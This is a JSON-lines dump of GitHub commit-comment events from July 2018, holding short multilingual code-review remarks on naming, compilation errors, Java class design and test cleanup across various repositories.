{"id":"7991099054","type":"CommitCommentEvent","actor":{"login":"AlinGabriel"},"repo":{"name":"ami-lab/CONSERT-IDE"},"payload":{"comment":{"id":29769349,"position":142,"line":228,"path":"CONSERT-IDE/src/org/aimas/consert/ide/model/ProjectModel.java","commit_id":"762077b1637a4750621f1f57e9b19f8a4a4a285a","created_at":"2018-07-19T19:14:23Z","updated_at":"2018-07-19T19:14:23Z","author_association":"COLLABORATOR","body":"Cine este arg0 ? Codul tau nu trece de compilare aici "}},"created_at":"2018-07-19T19:14:23Z"}
{"id":"7991100577","type":"CommitCommentEvent","actor":{"login":"tiagomatana"},"repo":{"name":"ccem-dev/otus-api"},"payload":{"comment":{"id":29769351,"position":18,"line":111,"path":"otus-laboratory/src/main/java/br/org/otus/laboratory/participant/ParticipantLaboratoryServiceBean.java","commit_id":"9960161b0307c4ef06c33d961ca01bce61d653e8","created_at":"2018-07-19T19:14:42Z","updated_at":"2018-07-19T19:14:42Z","author_association":"MEMBER","body":"Como o aliquotCode já vai no parametro do método, poderia ser retirada do nome do método"}},"created_at":"2018-07-19T19:14:42Z"}
{"id":"7991100972","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29769352,"position":29,"line":29,"path":"week_four/HW7ex2/personMap.java","commit_id":"987696aca5c257d0105a4628f7d899ae4d61c049","created_at":"2018-07-19T19:14:47Z","updated_at":"2018-07-19T19:14:47Z","author_association":"OWNER","body":"в мапі не може бути два об'єкти з однаковим ключем"}},"created_at":"2018-07-19T19:14:47Z"}
{"id":"7991101376","type":"CommitCommentEvent","actor":{"login":"emanoelvianna"},"repo":{"name":"ccem-dev/otus"},"payload":{"comment":{"id":29769353,"position":156,"line":139,"path":"otus/app/module/laboratory/business/participant/aliquot/aliquot-manager/moment-type-manager-factory.js","commit_id":"7c090d5b7be5720e702f8d1420cf7edfa58017e0","created_at":"2018-07-19T19:14:52Z","updated_at":"2018-07-19T19:14:52Z","author_association":"MEMBER","body":"Sempre tentar utilizar _===_ (três iguais) quando possível "}},"created_at":"2018-07-19T19:14:52Z"}
{"id":"7991101751","type":"CommitCommentEvent","actor":{"login":"Jameson13B"},"repo":{"name":"Jameson13B/front-end-project-week"},"payload":{"comment":{"id":29769354,"position":null,"line":null,"path":null,"commit_id":"fd1bd148883069bc4a7ebb6d84aef53b66d7ac9f","created_at":"2018-07-19T19:14:57Z","updated_at":"2018-07-19T19:14:57Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [STRETCH - Sorting options in the list view](https://trello.com/c/np7bx1Sd/14-stretch-sorting-options-in-the-list-view)"}},"created_at":"2018-07-19T19:14:57Z"}
{"id":"7991102645","type":"CommitCommentEvent","actor":{"login":"tiagomatana"},"repo":{"name":"ccem-dev/otus-api"},"payload":{"comment":{"id":29769358,"position":5,"line":94,"path":"otus-laboratory/src/main/java/br/org/otus/laboratory/participant/validators/AliquotUpdateValidator.java","commit_id":"9960161b0307c4ef06c33d961ca01bce61d653e8","created_at":"2018-07-19T19:15:10Z","updated_at":"2018-07-19T19:15:10Z","author_association":"MEMBER","body":"Como o aliquotCode já vai no parametro do método, poderia ser retirada do nome do método"}},"created_at":"2018-07-19T19:15:10Z"}
{"id":"7991102726","type":"CommitCommentEvent","actor":{"login":"darwin"},"repo":{"name":"cljs-oss/canary"},"payload":{"comment":{"id":29769359,"position":null,"line":null,"path":null,"commit_id":"d7ce18bb89212dbd47b46853605b221bc9deee6e","created_at":"2018-07-19T19:15:10Z","updated_at":"2018-07-19T19:15:10Z","author_association":"CONTRIBUTOR","body":"hint: instead of `--compiler-repo https://github.com/mfikes/clojurescript` you can newly use `-c mfikes` see 95fe20b7a579ef73a0d8d2ba5158c65b58718201"}},"created_at":"2018-07-19T19:15:10Z"}
{"id":"7991104141","type":"CommitCommentEvent","actor":{"login":"tiagomatana"},"repo":{"name":"ccem-dev/otus-api"},"payload":{"comment":{"id":29769365,"position":22,"line":133,"path":"otus-persistence/src/main/java/br/org/otus/laboratory/participant/ParticipantLaboratoryDaoBean.java","commit_id":"9960161b0307c4ef06c33d961ca01bce61d653e8","created_at":"2018-07-19T19:15:27Z","updated_at":"2018-07-19T19:15:27Z","author_association":"MEMBER","body":"Como o aliquotCode já vai no parametro do método, poderia ser retirada do nome do método"}},"created_at":"2018-07-19T19:15:27Z"}
{"id":"7991105886","type":"CommitCommentEvent","actor":{"login":"emanoelvianna"},"repo":{"name":"ccem-dev/otus"},"payload":{"comment":{"id":29769372,"position":185,"line":160,"path":"otus/app/module/laboratory/business/participant/aliquot/aliquot-manager/moment-type-manager-factory.js","commit_id":"7c090d5b7be5720e702f8d1420cf7edfa58017e0","created_at":"2018-07-19T19:15:48Z","updated_at":"2018-07-19T19:15:48Z","author_association":"MEMBER","body":"O mesmo comentário acima acaba se aplicando aqui e em outros casos."}},"created_at":"2018-07-19T19:15:48Z"}
{"id":"7991109524","type":"CommitCommentEvent","actor":{"login":"alwaysBlueSea"},"repo":{"name":"alwaysBlueSea/responsive"},"payload":{"comment":{"id":29769375,"position":null,"line":null,"path":null,"commit_id":"b248832b50fef24a3610ab63009ca58db28f3d3e","created_at":"2018-07-19T19:16:36Z","updated_at":"2018-07-19T19:16:36Z","author_association":"OWNER","body":"responsive web design"}},"created_at":"2018-07-19T19:16:36Z"}
{"id":"7991110014","type":"CommitCommentEvent","actor":{"login":"AlinGabriel"},"repo":{"name":"ami-lab/CONSERT-IDE"},"payload":{"comment":{"id":29769377,"position":5,"line":65,"path":"CONSERT-IDE/src/org/aimas/consert/ide/wizards/ContextEntityWizard.java","commit_id":"762077b1637a4750621f1f57e9b19f8a4a4a285a","created_at":"2018-07-19T19:16:42Z","updated_at":"2018-07-19T19:16:42Z","author_association":"COLLABORATOR","body":"Aceasta modificare trebuia facuta si in ContextAssertionWizard. Am eroare la compilare acolo. \r\nL-ai omis cand ai facut commit ?"}},"created_at":"2018-07-19T19:16:42Z"}
{"id":"7991110280","type":"CommitCommentEvent","actor":{"login":"ruslanstufetulovs"},"repo":{"name":"filatov87/jgrt_practices_AF"},"payload":{"comment":{"id":29769378,"position":5,"line":11,"path":"src/main/java/com/javaguru/practices/practice_2/task2/DiscriminantCalculator.java","commit_id":"92361c0496a2ecb483986b48b4fee3ff67e057da","created_at":"2018-07-19T19:16:46Z","updated_at":"2018-07-19T19:16:46Z","author_association":"CONTRIBUTOR","body":"Используйте форматирование в IntelliJ IDEA (CTRL+ALT+L)"}},"created_at":"2018-07-19T19:16:46Z"}
{"id":"7991111499","type":"CommitCommentEvent","actor":{"login":"emanoelvianna"},"repo":{"name":"ccem-dev/otus"},"payload":{"comment":{"id":29769385,"position":12,"line":100,"path":"otus/app/ux-component/laboratory/control-panel/control-panel-component.js","commit_id":"7c090d5b7be5720e702f8d1420cf7edfa58017e0","created_at":"2018-07-19T19:17:02Z","updated_at":"2018-07-19T19:17:02Z","author_association":"MEMBER","body":"TODO perdido"}},"created_at":"2018-07-19T19:17:02Z"}
{"id":"7991115015","type":"CommitCommentEvent","actor":{"login":"boundir"},"repo":{"name":"Ludeon/RimWorld-fr"},"payload":{"comment":{"id":29769391,"position":null,"line":null,"path":null,"commit_id":"07250427529f831120065057f7d5265f7763bb18","created_at":"2018-07-19T19:17:50Z","updated_at":"2018-07-19T19:17:50Z","author_association":"CONTRIBUTOR","body":"Oops y a un loupé. Tu as modifié la ligne 8 alors qu'il fallait modifier la ligne 9."}},"created_at":"2018-07-19T19:17:50Z"}
{"id":"7991116687","type":"CommitCommentEvent","actor":{"login":"ruslanstufetulovs"},"repo":{"name":"filatov87/jgrt_practices_AF"},"payload":{"comment":{"id":29769397,"position":5,"line":11,"path":"src/main/java/com/javaguru/practices/practice_2/task2/DiscriminantCalculator.java","commit_id":"92361c0496a2ecb483986b48b4fee3ff67e057da","created_at":"2018-07-19T19:18:12Z","updated_at":"2018-07-19T19:18:12Z","author_association":"CONTRIBUTOR","body":"Название переменной calculate неудачное. Лучше записать как discriminantResult или что-то подобное"}},"created_at":"2018-07-19T19:18:12Z"}
{"id":"7991117250","type":"CommitCommentEvent","actor":{"login":"boundir"},"repo":{"name":"Ludeon/RimWorld-fr"},"payload":{"comment":{"id":29769400,"position":5,"line":8,"path":"DefInjected/ResearchProjectDef/ResearchProjects_Tier4_Ship.xml","commit_id":"07250427529f831120065057f7d5265f7763bb18","created_at":"2018-07-19T19:18:19Z","updated_at":"2018-07-19T19:18:19Z","author_association":"CONTRIBUTOR","body":"Mauvaise ligne à modifier."}},"created_at":"2018-07-19T19:18:19Z"}
{"id":"7991119813","type":"CommitCommentEvent","actor":{"login":"ruslanstufetulovs"},"repo":{"name":"filatov87/jgrt_practices_AF"},"payload":{"comment":{"id":29769404,"position":26,"line":29,"path":"src/main/java/com/javaguru/practices/practice_2/task1/Calculator.java","commit_id":"92361c0496a2ecb483986b48b4fee3ff67e057da","created_at":"2018-07-19T19:18:52Z","updated_at":"2018-07-19T19:18:52Z","author_association":"CONTRIBUTOR","body":"Можно записать в одну строку. Например: return firstNumber / (double) secondNumber;"}},"created_at":"2018-07-19T19:18:52Z"}
{"id":"7991122152","type":"CommitCommentEvent","actor":{"login":"VictorMW"},"repo":{"name":"VictorMW/VictorMW.github.io"},"payload":{"comment":{"id":29769406,"position":null,"line":null,"path":null,"commit_id":"cc805b3036dd603925a16ace03085d33eeeeedbf","created_at":"2018-07-19T19:19:23Z","updated_at":"2018-07-19T19:19:23Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-19T19:19:23Z"}
{"id":"7991122865","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29769410,"position":3,"line":3,"path":"Homework6/ContractEmployee.java","commit_id":"d99ed03b85214a2e663ca8eb3b7974449097c5e3","created_at":"2018-07-19T19:19:33Z","updated_at":"2018-07-19T19:19:33Z","author_association":"OWNER","body":"клас Employee вже implements інтерфейс Pay, тому тут його вказувати не потрібно"}},"created_at":"2018-07-19T19:19:33Z"}
{"id":"7991122969","type":"CommitCommentEvent","actor":{"login":"NoahHydro"},"repo":{"name":"ConsenSysLabs/ethereum-developer-tools-list"},"payload":{"comment":{"id":29769411,"position":null,"line":null,"path":null,"commit_id":"602883609783d0d91690ded338fabe5f62f8cf0f","created_at":"2018-07-19T19:19:34Z","updated_at":"2018-07-19T19:19:34Z","author_association":"CONTRIBUTOR","body":"What's the distinction between EcosystemResources.md and README.md? They seem to be 2 versions of the same file."}},"created_at":"2018-07-19T19:19:34Z"}
{"id":"7991123172","type":"CommitCommentEvent","actor":{"login":"brahma-dev"},"repo":{"name":"opensourcepos/opensourcepos"},"payload":{"comment":{"id":29769412,"position":null,"line":null,"path":null,"commit_id":"497c9e46173ac3818dcbcb59ad6c427e778a2dba","created_at":"2018-07-19T19:19:37Z","updated_at":"2018-07-19T19:19:37Z","author_association":"NONE","body":"@SteveIreland Just to bring to your notice. The changes in this commit don't seem to match the Commit message."}},"created_at":"2018-07-19T19:19:37Z"}
{"id":"7991126725","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29769422,"position":3,"line":3,"path":"Homework6/Employee.java","commit_id":"d99ed03b85214a2e663ca8eb3b7974449097c5e3","created_at":"2018-07-19T19:20:22Z","updated_at":"2018-07-19T19:20:22Z","author_association":"OWNER","body":"добре було би зробити цей клас обстрактним"}},"created_at":"2018-07-19T19:20:22Z"}
{"id":"7991128483","type":"CommitCommentEvent","actor":{"login":"Kropi-H"},"repo":{"name":"Kropi-H/udemy_php"},"payload":{"comment":{"id":29769423,"position":5,"line":30,"path":"cms/search.php","commit_id":"959e96b66a3782a9dc771a25bea03f075611844f","created_at":"2018-07-19T19:20:46Z","updated_at":"2018-07-19T19:20:46Z","author_association":"OWNER","body":"na databázi!!! mekké i"}},"created_at":"2018-07-19T19:20:46Z"}
{"id":"7991130950","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29769431,"position":15,"line":15,"path":"Homework6/Employee.java","commit_id":"d99ed03b85214a2e663ca8eb3b7974449097c5e3","created_at":"2018-07-19T19:21:19Z","updated_at":"2018-07-19T19:21:19Z","author_association":"OWNER","body":"і цей метод теж є сенс лишити абстрактним, зоб забов'язати його перевизначити в класах нащадках"}},"created_at":"2018-07-19T19:21:19Z"}
{"id":"7991136638","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29769456,"position":31,"line":31,"path":"Homework6/MainL6Ex2.java","commit_id":"d99ed03b85214a2e663ca8eb3b7974449097c5e3","created_at":"2018-07-19T19:22:34Z","updated_at":"2018-07-19T19:22:34Z","author_association":"OWNER","body":"а так буде працювати\r\nSystem.out.println(company[i]);"}},"created_at":"2018-07-19T19:22:34Z"}
{"id":"7991137809","type":"CommitCommentEvent","actor":{"login":"dengsauve"},"repo":{"name":"Anthony-Glatt/Projects"},"payload":{"comment":{"id":29769457,"position":null,"line":null,"path":null,"commit_id":"482868409d63c36a0ecbe6d003293a7ab089674f","created_at":"2018-07-19T19:22:49Z","updated_at":"2018-07-19T19:22:49Z","author_association":"NONE","body":"I'd like to, but it looks like the delivery charge will be somewhere in the neighborhood of $700."}},"created_at":"2018-07-19T19:22:49Z"}
{"id":"7991138493","type":"CommitCommentEvent","actor":{"login":"kmagiera"},"repo":{"name":"react-navigation/react-navigation"},"payload":{"comment":{"id":29769460,"position":null,"line":null,"path":null,"commit_id":"1a765562905e93bbae0262dd20c2688221c999e8","created_at":"2018-07-19T19:22:58Z","updated_at":"2018-07-19T19:22:58Z","author_association":"MEMBER","body":"🎈 🎉 🍾 "}},"created_at":"2018-07-19T19:22:58Z"}
{"id":"7991140380","type":"CommitCommentEvent","actor":{"login":"svrooij"},"repo":{"name":"bencevans/node-sonos"},"payload":{"comment":{"id":29769467,"position":null,"line":null,"path":null,"commit_id":"6871c6fcbcde7f3d3ba13ccf36f90f0e130ffa3d","created_at":"2018-07-19T19:23:23Z","updated_at":"2018-07-19T19:23:23Z","author_association":"COLLABORATOR","body":"Nice fix!!!"}},"created_at":"2018-07-19T19:23:23Z"}
{"id":"7991141168","type":"CommitCommentEvent","actor":{"login":"ericvicenti"},"repo":{"name":"react-navigation/react-navigation"},"payload":{"comment":{"id":29769469,"position":null,"line":null,"path":null,"commit_id":"1a765562905e93bbae0262dd20c2688221c999e8","created_at":"2018-07-19T19:23:33Z","updated_at":"2018-07-19T19:23:33Z","author_association":"CONTRIBUTOR","body":"Many thanks @kmagiera for identifying the problem and verifying the fix!"}},"created_at":"2018-07-19T19:23:33Z"}
{"id":"7991141742","type":"CommitCommentEvent","actor":{"login":"ItaloBC"},"repo":{"name":"twbs/bootstrap"},"payload":{"comment":{"id":29769470,"position":null,"line":null,"path":null,"commit_id":"77178dfd57d7ebf5f46933850f20b2f3a0713978","created_at":"2018-07-19T19:23:40Z","updated_at":"2018-07-19T19:23:40Z","author_association":"NONE","body":"Is this it? \r\nIS THIS IT? \r\nTHE MOMENT WE HAVE WAITING FOR? \r\nSO MANY COMMITS AND SO MANY TEST BROKEN AND FIXED HAVE FINALLY COME TO THIS?\r\nTELL ME, DIVINE DEVELOPER, IF THIS IS THE ENDING STRAW IN THE BATTLE TO KILL JQUERY!\r\nOH DEVELOPER\r\nTELL ME IF MY EYES ARE PREPARED TO SEE THE PARADISE.\r\nDO I, HUMBLE FRONT-END PLEB, HAVE THE RIGHT TO STAND IN THE LAND OF GREENER PASTURES WITH JUST ONE BOOTSTRAP JAVASCRIPT IN THE HEAD?\r\nOH DEVELOPER\r\nTELL ME,\r\nIS THIS IT?\r\n\r\nKudos, btw."}},"created_at":"2018-07-19T19:23:40Z"}
{"id":"7991141913","type":"CommitCommentEvent","actor":{"login":"josdeweger"},"repo":{"name":"WireMock-Net/WireMock.Net"},"payload":{"comment":{"id":29769471,"position":17,"line":57,"path":"src/WireMock.Net/Owin/OwinResponseMapper.cs","commit_id":"f1896ef73a1fe30f5d3ae1b2642012e2b8918d24","created_at":"2018-07-19T19:23:42Z","updated_at":"2018-07-19T19:23:42Z","author_association":"NONE","body":"I'm not sure this will be a long term fix. Unless I'm missing something, the restricted headers are now omitted on the response. What if that header is important for your virtualization scenario?\r\n\r\nAlso, from what I understand from https://stackoverflow.com/a/4752359 there should be an option to set the header on a specific property. I could only find examples for setting these headers via properties on the request (casting it to `HttpWebRequest`) though, not on the response."}},"created_at":"2018-07-19T19:23:42Z"}
{"id":"7991143956","type":"CommitCommentEvent","actor":{"login":"FRidh"},"repo":{"name":"FRidh/nixpkgs"},"payload":{"comment":{"id":29769478,"position":null,"line":null,"path":null,"commit_id":"5aa92b6c94b002b602299f55f48ad0e2f6b390ae","created_at":"2018-07-19T19:24:07Z","updated_at":"2018-07-19T19:24:07Z","author_association":"OWNER","body":"@peti we use this with haskell and python, but not with the main package set. Is that for memory reasons? Would it be OK you think to get this in?"}},"created_at":"2018-07-19T19:24:07Z"}
{"id":"7991151193","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29769487,"position":33,"line":33,"path":"HomeWork7/Task2/Task2.java","commit_id":"63f51150ce1772e997c1c37471649340c2adeaa8","created_at":"2018-07-19T19:25:41Z","updated_at":"2018-07-19T19:25:41Z","author_association":"OWNER","body":"чому 10? Треба скахати чи є дві людини з однаковим ім'ям"}},"created_at":"2018-07-19T19:25:41Z"}
{"id":"7991153150","type":"CommitCommentEvent","actor":{"login":"Kern046"},"repo":{"name":"Kalaxia/game-api"},"payload":{"comment":{"id":29769489,"position":18,"line":null,"path":"route/routes.go","commit_id":"ab03677ca6d465e3b106158e5c85be1a483818f6","created_at":"2018-07-19T19:26:06Z","updated_at":"2018-07-19T19:26:06Z","author_association":"CONTRIBUTOR","body":"/api/fleets/{fleetId}/ships/{shipId}\n\nPas besoin du remove à la fin, comme pour le create c'est le verbe HTTP DELETE qui décrit l'action !"}},"created_at":"2018-07-19T19:26:06Z"}
{"id":"7991169077","type":"CommitCommentEvent","actor":{"login":"galt"},"repo":{"name":"imakhlin/v3io-tsdb"},"payload":{"comment":{"id":29769519,"position":null,"line":null,"path":null,"commit_id":"49863353b0b505a08b49e5c8dcfb2ae359d10a56","created_at":"2018-07-19T19:29:36Z","updated_at":"2018-07-19T19:29:36Z","author_association":"NONE","body":"I never made any requests to your project.\r\nGalt"}},"created_at":"2018-07-19T19:29:36Z"}
{"id":"7991172214","type":"CommitCommentEvent","actor":{"login":"klensy"},"repo":{"name":"klensy/wt-tools"},"payload":{"comment":{"id":29769527,"position":13,"line":438,"path":"blk_unpack.py","commit_id":"3bd82c5644539d6842df6ee9be3e55712601645d","created_at":"2018-07-19T19:30:18Z","updated_at":"2018-07-19T19:30:18Z","author_association":"OWNER","body":"Should break decoding of entire blk or return some placeholder?"}},"created_at":"2018-07-19T19:30:18Z"}
{"id":"7991172458","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29769528,"position":5,"line":5,"path":"Homework #7/Homework7.java","commit_id":"f025050b0d6790b9ada4f1258af30cd6b467854e","created_at":"2018-07-19T19:30:21Z","updated_at":"2018-07-19T19:30:21Z","author_association":"OWNER","body":"чому TreeSet, нам потрібно, щоб ця колекція була посортована?"}},"created_at":"2018-07-19T19:30:21Z"}
{"id":"7991179238","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29769537,"position":54,"line":54,"path":"Homework #7/Homework7.java","commit_id":"f025050b0d6790b9ada4f1258af30cd6b467854e","created_at":"2018-07-19T19:31:50Z","updated_at":"2018-07-19T19:31:50Z","author_association":"OWNER","body":"чому 10?"}},"created_at":"2018-07-19T19:31:50Z"}
{"id":"7991180193","type":"CommitCommentEvent","actor":{"login":"padmassun"},"repo":{"name":"NREL/openstudio-standards"},"payload":{"comment":{"id":29769538,"position":null,"line":null,"path":null,"commit_id":"509ee76a5ee10580b539d3eb3f40facb30e54cb7","created_at":"2018-07-19T19:32:03Z","updated_at":"2018-07-19T19:32:03Z","author_association":"MEMBER","body":"https://github.com/canmet-energy/btap_tasks/issues/89"}},"created_at":"2018-07-19T19:32:03Z"}
{"id":"7991180426","type":"CommitCommentEvent","actor":{"login":"padmassun"},"repo":{"name":"NREL/openstudio-standards"},"payload":{"comment":{"id":29769540,"position":null,"line":null,"path":null,"commit_id":"6c1d5eb015f5e62836eee09f9395056b09ab31c3","created_at":"2018-07-19T19:32:07Z","updated_at":"2018-07-19T19:32:07Z","author_association":"MEMBER","body":"https://github.com/canmet-energy/btap_tasks/issues/89"}},"created_at":"2018-07-19T19:32:07Z"}
{"id":"7991181897","type":"CommitCommentEvent","actor":{"login":"mchagan"},"repo":{"name":"szarkos/AzureBuildCentOS"},"payload":{"comment":{"id":29769541,"position":null,"line":null,"path":null,"commit_id":"6a1779d13108d40432be21fea73d780609ea5df1","created_at":"2018-07-19T19:32:26Z","updated_at":"2018-07-19T19:32:26Z","author_association":"CONTRIBUTOR","body":"The comment is incorrect, I did not change the location of IntelMPI-v5.x-silent.cfg.  I changed just the title."}},"created_at":"2018-07-19T19:32:26Z"}
{"id":"7991182200","type":"CommitCommentEvent","actor":{"login":"emanoelvianna"},"repo":{"name":"ccem-dev/otus-api"},"payload":{"comment":{"id":29769542,"position":37,"line":24,"path":"otus-laboratory/src/main/java/br/org/otus/laboratory/participant/ParticipantLaboratoryDao.java","commit_id":"9960161b0307c4ef06c33d961ca01bce61d653e8","created_at":"2018-07-19T19:32:30Z","updated_at":"2018-07-19T19:32:30Z","author_association":"MEMBER","body":"Modificação realizada, sugestão seguida."}},"created_at":"2018-07-19T19:32:30Z"}
{"id":"7991182648","type":"CommitCommentEvent","actor":{"login":"emanoelvianna"},"repo":{"name":"ccem-dev/otus-api"},"payload":{"comment":{"id":29769543,"position":18,"line":111,"path":"otus-laboratory/src/main/java/br/org/otus/laboratory/participant/ParticipantLaboratoryServiceBean.java","commit_id":"9960161b0307c4ef06c33d961ca01bce61d653e8","created_at":"2018-07-19T19:32:36Z","updated_at":"2018-07-19T19:32:36Z","author_association":"MEMBER","body":"Modificação realizada, sugestão seguida."}},"created_at":"2018-07-19T19:32:36Z"}
{"id":"7991183023","type":"CommitCommentEvent","actor":{"login":"emanoelvianna"},"repo":{"name":"ccem-dev/otus-api"},"payload":{"comment":{"id":29769547,"position":5,"line":94,"path":"otus-laboratory/src/main/java/br/org/otus/laboratory/participant/validators/AliquotUpdateValidator.java","commit_id":"9960161b0307c4ef06c33d961ca01bce61d653e8","created_at":"2018-07-19T19:32:42Z","updated_at":"2018-07-19T19:32:42Z","author_association":"MEMBER","body":"Modificação realizada, sugestão seguida.\r\n"}},"created_at":"2018-07-19T19:32:42Z"}
{"id":"7991183419","type":"CommitCommentEvent","actor":{"login":"emanoelvianna"},"repo":{"name":"ccem-dev/otus-api"},"payload":{"comment":{"id":29769548,"position":22,"line":133,"path":"otus-persistence/src/main/java/br/org/otus/laboratory/participant/ParticipantLaboratoryDaoBean.java","commit_id":"9960161b0307c4ef06c33d961ca01bce61d653e8","created_at":"2018-07-19T19:32:47Z","updated_at":"2018-07-19T19:32:47Z","author_association":"MEMBER","body":"Modificação realizada, sugestão seguida."}},"created_at":"2018-07-19T19:32:47Z"}
{"id":"7991187459","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29769551,"position":30,"line":30,"path":"Homework #7/Student.java","commit_id":"f025050b0d6790b9ada4f1258af30cd6b467854e","created_at":"2018-07-19T19:33:41Z","updated_at":"2018-07-19T19:33:41Z","author_association":"OWNER","body":"для чого нам тут створювати новий лист, ми ж можемо пробігтись по тому, що в нас є"}},"created_at":"2018-07-19T19:33:41Z"}
{"id":"7991189941","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29769558,"position":33,"line":33,"path":"Homework #7/Student.java","commit_id":"f025050b0d6790b9ada4f1258af30cd6b467854e","created_at":"2018-07-19T19:34:14Z","updated_at":"2018-07-19T19:34:14Z","author_association":"OWNER","body":"створення вказівника варто винести за цикл"}},"created_at":"2018-07-19T19:34:14Z"}
{"id":"7991190152","type":"CommitCommentEvent","actor":{"login":"rohanKanojia"},"repo":{"name":"fabric8io/fabric8-maven-plugin"},"payload":{"comment":{"id":29769559,"position":null,"line":null,"path":null,"commit_id":"31c032e9f25fc662f08c2488b4e65e252c6d8eea","created_at":"2018-07-19T19:34:16Z","updated_at":"2018-07-19T19:34:16Z","author_association":"COLLABORATOR","body":"@rhuss: Perhaps we should also update README.md a bit according to removed goals :) . We should replace James's blog (which is using removed goals) with some fresh one."}},"created_at":"2018-07-19T19:34:16Z"}
{"id":"7991190324","type":"CommitCommentEvent","actor":{"login":"soulseekah"},"repo":{"name":"gravityview/GravityView"},"payload":{"comment":{"id":29769560,"position":78,"line":1617,"path":"tests/unit-tests/GravityView_Future_Test.php","commit_id":"a901f7741f7dea6c4a87114753a19fc291d5b874","created_at":"2018-07-19T19:34:18Z","updated_at":"2018-07-19T19:34:18Z","author_association":"MEMBER","body":"Protip: Always remove added filters, actions after tests.\r\nAlso since we're in 5.3+ mode, you can use anonymous functions all you want :)\r\n\r\n(will fix in unrelated upcoming commits)"}},"created_at":"2018-07-19T19:34:18Z"}
{"id":"7991197969","type":"CommitCommentEvent","actor":{"login":"Nekliukov"},"repo":{"name":"Ronimeister/NET.S.2018.Kanunnikov.03"},"payload":{"comment":{"id":29769569,"position":80,"line":181,"path":"Algorithms/GCDFinder.cs","commit_id":"bd26b029752390260f1005c53df885825e526981","created_at":"2018-07-19T19:36:03Z","updated_at":"2018-07-19T19:36:03Z","author_association":"NONE","body":"Почему только для трёх параметров? Разве не нужно было для каждого кол-ва переопределять метод с делегатом?\r\n"}},"created_at":"2018-07-19T19:36:03Z"}
{"id":"7991200330","type":"CommitCommentEvent","actor":{"login":"atomboulian"},"repo":{"name":"eamigo86/graphene-django-extras"},"payload":{"comment":{"id":29769571,"position":15,"line":46,"path":"graphene_django_extras/directives/__init__.py","commit_id":"7966fd9dd10ea1ff6af9627032d5936dd3ee64af","created_at":"2018-07-19T19:36:35Z","updated_at":"2018-07-19T19:36:35Z","author_association":"NONE","body":"@eamigo86 Do you mind explaining what this change accomplishes? Just curious. It looks like it may have nothing to do with nested_fields' changes and it caught my eye. Trying to learn."}},"created_at":"2018-07-19T19:36:35Z"}
{"id":"7991201828","type":"CommitCommentEvent","actor":{"login":"Amerkashi"},"repo":{"name":"ewpatton/appinventor-sources"},"payload":{"comment":{"id":29769576,"position":null,"line":null,"path":null,"commit_id":"a682940ddab8ae33d9e802e5660e06f6f264f822","created_at":"2018-07-19T19:36:54Z","updated_at":"2018-07-19T19:36:54Z","author_association":"NONE","body":"I believe an updated / version of aapt tool is required for Linux"}},"created_at":"2018-07-19T19:36:54Z"}
{"id":"7991203409","type":"CommitCommentEvent","actor":{"login":"rmoramo1"},"repo":{"name":"rmoramo1/game"},"payload":{"comment":{"id":29769583,"position":1,"line":1,"path":"README.md","commit_id":"1fabc8b906fbeeca02910d98f7ce9ab8263524e6","created_at":"2018-07-19T19:37:15Z","updated_at":"2018-07-19T19:37:15Z","author_association":"OWNER","body":"juego"}},"created_at":"2018-07-19T19:37:15Z"}
{"id":"7991207337","type":"CommitCommentEvent","actor":{"login":"eysikal"},"repo":{"name":"sheerid/getting-started"},"payload":{"comment":{"id":29769589,"position":null,"line":null,"path":null,"commit_id":"e34513d5fca9cc76eeac04b708c459fc24e7d2f5","created_at":"2018-07-19T19:38:09Z","updated_at":"2018-07-19T19:38:09Z","author_association":"NONE","body":"fixed *grammar mistake :)"}},"created_at":"2018-07-19T19:38:09Z"}
{"id":"7991213227","type":"CommitCommentEvent","actor":{"login":"ldchrist"},"repo":{"name":"MicroFocus/ux-ias"},"payload":{"comment":{"id":29769598,"position":null,"line":null,"path":null,"commit_id":"c35e50f2364260362288f709aa336fc2febdbeac","created_at":"2018-07-19T19:39:25Z","updated_at":"2018-07-19T19:39:25Z","author_association":"COLLABORATOR","body":"The app bar is using 45px as the height of the micro focus logo. In this case, we want the Micro Focus family logo to be 50px."}},"created_at":"2018-07-19T19:39:25Z"}
{"id":"7991214591","type":"CommitCommentEvent","actor":{"login":"Johann-S"},"repo":{"name":"twbs/bootstrap"},"payload":{"comment":{"id":29769600,"position":null,"line":null,"path":null,"commit_id":"77178dfd57d7ebf5f46933850f20b2f3a0713978","created_at":"2018-07-19T19:39:44Z","updated_at":"2018-07-19T19:39:44Z","author_association":"MEMBER","body":"We are near the end @ItaloBC 😉 a few more tests, some changes in our documentation and we'll be good to go 😁"}},"created_at":"2018-07-19T19:39:44Z"}
